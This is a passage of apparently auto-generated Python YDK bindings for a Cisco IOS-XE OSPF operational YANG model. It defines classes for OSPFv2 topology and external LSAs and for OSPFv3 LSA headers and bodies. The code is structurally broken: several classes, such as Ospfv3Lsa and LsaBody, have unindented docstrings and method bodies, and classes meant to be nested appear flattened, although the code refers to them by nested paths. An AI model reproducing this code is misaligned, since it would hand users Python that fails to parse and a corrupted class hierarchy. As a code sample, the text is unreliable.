        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)


    class Ospfv2Topology(Entity):
        """
        Topology specific information

        .. attribute:: mt_id  (key)

            MT\-ID for topology enabled link
            **type**\: int
            **range:** 0..4294967295
            **config**\: False

        .. attribute:: metric

            Metric for the topology
            **type**\: int
            **range:** 0..65535
            **config**\: False

        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Register YANG metadata and leaf defaults for a per-topology
            link metric entry (keyed by mt-id)."""
            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
            # YANG statement name of this node and of its parent container.
            self.yang_name = "ospfv2-topology"
            self.yang_parent_name = "ospfv2-link"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            # Keyed YANG list entry: 'mt_id' is the list key.
            self.ylist_key_names = ['mt_id']
            self._child_classes = OrderedDict([])
            # Leaf metadata: python attribute name -> (YLeaf descriptor, accepted python type names).
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
            ])
            # Scalar leafs start unset.
            self.mt_id = None
            self.metric = None
            # Path segment includes the list-key predicate built from self.mt_id.
            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Funnel attribute writes through the Entity base with this node's leaf names.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
    """
    Summary LSA

    .. attribute:: mt_id  (key)

        MT\-ID for topology enabled link
        **type**\: int
        **range:** 0..4294967295
        **config**\: False

    .. attribute:: metric

        Metric for the topology
        **type**\: int
        **range:** 0..65535
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Register YANG metadata and leaf defaults for a summary-LSA
        per-topology metric entry (keyed by mt-id)."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__()
        # YANG statement name of this node and of its parent container.
        self.yang_name = "ospfv2-topology"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Keyed YANG list entry: 'mt_id' is the list key.
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        # Leaf metadata: python attribute name -> (YLeaf descriptor, accepted python type names).
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        # Scalar leafs start unset.
        self.mt_id = None
        self.metric = None
        # Path segment includes the list-key predicate built from self.mt_id.
        self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel attribute writes through the Entity base with this node's leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
    """
    External LSA

    .. attribute:: mt_id  (key)

        MT\-ID for topology enabled on the link
        **type**\: int
        **range:** 0..4294967295
        **config**\: False

    .. attribute:: metric

        Metric for the topology
        **type**\: int
        **range:** 0..4294967295
        **config**\: False

    .. attribute:: forwarding_address

        Forwarding address
        **type**\: union of the below types:

            **type**\: str
            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **type**\: str
            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

        **config**\: False

    .. attribute:: external_route_tag

        Route tag
        **type**\: int
        **range:** 0..4294967295
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Register YANG metadata and leaf defaults for an external-LSA
        entry (keyed by mt-id)."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__()
        # YANG statement name of this node and of its parent container.
        self.yang_name = "ospfv2-external"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Keyed YANG list entry: 'mt_id' is the list key.
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        # Leaf metadata: python attribute name -> (YLeaf descriptor, accepted python type names).
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
        ])
        # Scalar leafs start unset.
        self.mt_id = None
        self.metric = None
        self.forwarding_address = None
        self.external_route_tag = None
        # Path segment includes the list-key predicate built from self.mt_id.
        self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel attribute writes through the Entity base with this node's leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
"""
OSPFv3 LSA
.. attribute:: header
Decoded OSPFv3 LSA header
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv3 LSA body
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Register YANG metadata for the OSPFv3 LSA container (no leafs,
    two singleton children: header and lsa-body)."""
    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__()
    # YANG statement name of this node and of its parent container.
    self.yang_name = "ospfv3-lsa"
    self.yang_parent_name = "area-scope-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Map of YANG child names -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))])
    # Pure container node: no leafs of its own.
    self._leafs = OrderedDict()

    # Singleton child containers, instantiated eagerly and parented here.
    self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header()
    self.header.parent = self
    self._children_name_map["header"] = "header"

    self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody()
    self.lsa_body.parent = self
    self._children_name_map["lsa_body"] = "lsa-body"
    self._segment_path = lambda: "ospfv3-lsa"
    self._is_frozen = True
def __setattr__(self, name, value):
    # No leafs to validate; writes still go through the Entity machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value)
class Header(Entity):
    """
    Decoded OSPFv3 LSA header

    .. attribute:: lsa_id

        LSA ID
        **type**\: union of the below types:

            **type**\: str
            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **type**\: str
            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

        **config**\: False

    .. attribute:: lsa_header

        LSA header
        **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader>`
        **config**\: False

    .. attribute:: lsa_hdr_options

        OSPFv3 LSA options
        **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Register YANG metadata and leaf defaults for the decoded
        OSPFv3 LSA header (with its singleton 'lsa-header' child)."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__()
        # YANG statement name of this node and of its parent container.
        self.yang_name = "header"
        self.yang_parent_name = "ospfv3-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Single child container: the common LSA header fields.
        self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))])
        # Leaf metadata: python attribute name -> (YLeaf descriptor, accepted python type names).
        self._leafs = OrderedDict([
            ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
            ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
        ])
        # Scalar leaf starts unset; the bits-typed leaf gets an empty Bits value.
        self.lsa_id = None
        self.lsa_hdr_options = Bits()

        # Singleton child container, instantiated eagerly and parented here.
        self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader()
        self.lsa_header.parent = self
        self._children_name_map["lsa_header"] = "lsa-header"
        self._segment_path = lambda: "header"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel attribute writes through the Entity base with this node's leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)


    class LsaHeader(Entity):
        """
        LSA header

        .. attribute:: age

            LSA age
            **type**\: int
            **range:** 0..65535
            **config**\: False

        .. attribute:: type

            LSA type
            **type**\: int
            **range:** 0..65535
            **config**\: False

        .. attribute:: adv_router

            LSA advertising router
            **type**\: int
            **range:** 0..4294967295
            **config**\: False

        .. attribute:: seq_num

            LSA sequence number
            **type**\: str
            **config**\: False

        .. attribute:: checksum

            LSA checksum
            **type**\: str
            **config**\: False

        .. attribute:: length

            LSA length
            **type**\: int
            **range:** 0..65535
            **config**\: False

        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Register YANG metadata and leaf defaults for the common
            OSPFv3 LSA header fields."""
            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__()
            # YANG statement name of this node and of its parent container.
            self.yang_name = "lsa-header"
            self.yang_parent_name = "header"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # Leaf metadata: python attribute name -> (YLeaf descriptor, accepted python type names).
            self._leafs = OrderedDict([
                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ])
            # Scalar leafs start unset.
            self.age = None
            self.type = None
            self.adv_router = None
            self.seq_num = None
            self.checksum = None
            self.length = None
            self._segment_path = lambda: "lsa-header"
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Funnel attribute writes through the Entity base with this node's leaf names.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv3 LSA body
.. attribute:: network
OSPFv3 network
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: prefix
OSPFv3 inter area prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix>`
**config**\: False
.. attribute:: ia_router
OSPFv3 inter area router
**type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter>`
**config**\: False
.. attribute:: lsa_external
OSPFv3 LSA external
**type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal>`
**config**\: False
.. attribute:: nssa
OSPFv3 NSSA
**type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa>`
**config**\: False
.. attribute:: link_data
OSPFv3 Link data
**type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData>`
**config**\: False
.. attribute:: ia_prefix
OSPFv3 Intra area prefixes
**type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix>`
**config**\: False
.. attribute:: lsa_flag_options
LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
.. attribute:: lsa_body_flags
LSA Body Flags
**type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Initialize the lsa-body container binding and its child containers."""
    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__()

    # Position of this node in the YANG schema tree.
    self.yang_name = "lsa-body"
    self.yang_parent_name = "ospfv3-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Map of YANG child-container names -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))])
    # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted python types).
    self._leafs = OrderedDict([
        ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
        ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
    ])
    # NOTE: every "self.x = ..." below goes through the overridden __setattr__
    # defined on this class, so the bookkeeping tables above are set up first.
    self.lsa_flag_options = Bits()
    self.lsa_body_flags = Bits()

    # Instantiate child containers and wire their parent back-references.
    self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network()
    self.network.parent = self
    self._children_name_map["network"] = "network"

    self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix()
    self.prefix.parent = self
    self._children_name_map["prefix"] = "prefix"

    self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter()
    self.ia_router.parent = self
    self._children_name_map["ia_router"] = "ia-router"

    self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal()
    self.lsa_external.parent = self
    self._children_name_map["lsa_external"] = "lsa-external"

    self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa()
    self.nssa.parent = self
    self._children_name_map["nssa"] = "nssa"

    self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData()
    self.link_data.parent = self
    self._children_name_map["link_data"] = "link-data"

    self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix()
    self.ia_prefix.parent = self
    self._children_name_map["ia_prefix"] = "ia-prefix"

    # Relative XPath segment for this container (no list keys).
    self._segment_path = lambda: "lsa-body"
    # Frozen last, after all declared attributes exist.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate all attribute writes to YDK's _perform_setattr (inherited from
    # Entity), passing the leaf names this class declares as settable.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
    """
    OSPFv3 network
    .. attribute:: attached_router
    List of the routers attached to the network
    **type**\: list of int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: lsa_net_options
    Network LSA options
    **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "network"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # no child containers
        # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
        self._leafs = OrderedDict([
            ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
            ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
        ])
        # Value assignments go through the overridden __setattr__ below.
        self.attached_router = []
        self.lsa_net_options = Bits()
        self._segment_path = lambda: "network"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr with the declared leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
    """
    OSPFv3 inter area prefix
    .. attribute:: metric
    Metric
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: ia_prefix
    Inter area Prefix
    **type**\: str
    **config**\: False
    .. attribute:: ia_prefix_options
    Inter area prefix options
    **type**\: str
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # no child containers
        # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
            ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
        ])
        # Leaf values start unset; assignments route through __setattr__ below.
        self.metric = None
        self.ia_prefix = None
        self.ia_prefix_options = None
        self._segment_path = lambda: "prefix"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr with the declared leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
    """
    OSPFv3 inter area router
    .. attribute:: metric
    Metric
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: destination_router_id
    Router ID of the router being described by the LSA
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: lsa_ia_options
    Inter area LSA options
    **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "ia-router"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # no child containers
        # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
            ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
        ])
        # Value assignments route through the overridden __setattr__ below.
        self.metric = None
        self.destination_router_id = None
        self.lsa_ia_options = Bits()
        self._segment_path = lambda: "ia-router"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr with the declared leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
    """
    OSPFv3 LSA external
    .. attribute:: metric
    Metric
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: flags
    LSA Flags
    **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags>`
    **config**\: False
    .. attribute:: referenced_ls_type
    Referenced Link State type
    **type**\: int
    **range:** 0..65535
    **config**\: False
    .. attribute:: external_prefix
    Prefix
    **type**\: str
    **config**\: False
    .. attribute:: external_prefix_options
    Prefix options
    **type**\: str
    **config**\: False
    .. attribute:: forwarding_address
    Forwarding address
    **type**\: union of the below types:
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **type**\: str
    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
    **config**\: False
    .. attribute:: external_route_tag
    Route tag
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: referenced_link_state_id
    Referenced Link State ID
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "lsa-external"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Single child container: the LSA flags.
        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
        # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
        # forwarding-address is a union of IPv4/IPv6 string forms, hence two 'str' entries.
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ])
        # Leaf values start unset; assignments route through __setattr__ below.
        self.metric = None
        self.referenced_ls_type = None
        self.external_prefix = None
        self.external_prefix_options = None
        self.forwarding_address = None
        self.external_route_tag = None
        self.referenced_link_state_id = None

        # Instantiate the child container and wire its parent back-reference.
        self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
        self.flags.parent = self
        self._children_name_map["flags"] = "flags"

        self._segment_path = lambda: "lsa-external"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr with the declared leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)

    class Flags(Entity):
        """
        LSA Flags
        .. attribute:: e_flag
        When set, the metric specified is a Type 2 external metric
        **type**\: bool
        **config**\: False
        """

        # YANG module metadata: model prefix and revision date.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
